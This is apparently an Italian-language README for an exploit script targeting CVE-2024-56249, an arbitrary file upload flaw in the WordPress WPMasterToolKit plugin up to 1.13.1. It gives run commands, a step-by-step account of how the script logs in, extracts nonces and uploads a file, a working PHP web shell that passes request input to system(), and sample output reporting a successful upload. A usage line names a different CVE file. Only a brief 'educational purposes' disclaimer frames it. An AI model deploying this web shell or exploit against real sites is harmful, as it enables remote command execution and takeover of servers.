
WordPress WPMasterToolKit plugin <= 1.13.1 - Vulnerabilità di caricamento file arbitrario
Questo script sfrutta una vulnerabilità di Caricamento File Arbitrario nel plugin WordPress WPMasterToolKit, consentendo a un attaccante di caricare una web shell sul server. La vulnerabilità esiste nelle versioni <= 1.13.1 del plugin.
| CVE ID: | CVE-2024-56249 |
| Pubblicato: | 2025-01-02 |
| Aggiornato: | 2025-01-02 |
| Descrizione: | La vulnerabilità di Caricamento senza restrizioni di file con tipo pericoloso in Webdeclic WPMasterToolKit consente di caricare una Web Shell su un server Web. |
| CWE: | CWE-434: Caricamento senza restrizioni di file con tipo pericoloso (Unrestricted Upload of File with Dangerous Type) |
| Punteggio CVSS: | 9.1 (Critico) |
| Vettore CVSS: | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |
Per sfruttare questa vulnerabilità, usa il seguente comando:
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>
-u / --url: URL di WordPress target (ad es., http://192.168.100.74:888/wordpress)-un / --username: Nome utente amministratore WordPress-p / --password: Password amministratore WordPress-fp / --filepath: Percorso di upload del file (predefinito: wp-content/uploads/2025/03)-fn / --filename: Nome del file da caricare (predefinito: shell.php)Lo script inizia sondando l'URL target per verificare se è vulnerabile a CVE-2024-56249 controllando la versione del plugin WPMasterToolKit.
Prova quindi ad accedere al pannello di amministrazione di WordPress utilizzando le credenziali fornite.
Dopo un login riuscito, lo script estrae i token di sicurezza necessari (nonce e token) richiesti per il caricamento del file.
Carica il file specificato (ad es., una web shell) sul server target utilizzando i token estratti.
Infine, lo script verifica se il file è stato caricato con successo controllando la sua accessibilità tramite l'URL target.
Assicurati che il file shell (ad es., shell.php) sia posizionato nella stessa directory dello script prima di eseguirlo. Questo è necessario affinché lo script possa individuare e caricare correttamente il file.
shell.php)<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}
?>
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]
Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
-un, --username USERNAME
WordPress admin username
-p, --password PASSWORD
WordPress admin password
-fp, --filepath FILEPATH
File upload path (default: wp-content/uploads/2025/03)
-fn, --filename FILENAME
File name to upload (default: shell.php)
Questo strumento è destinato esclusivamente a scopi educativi. Usalo a tuo rischio. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.
Exploit script by Nxploit | Khaled Alenazi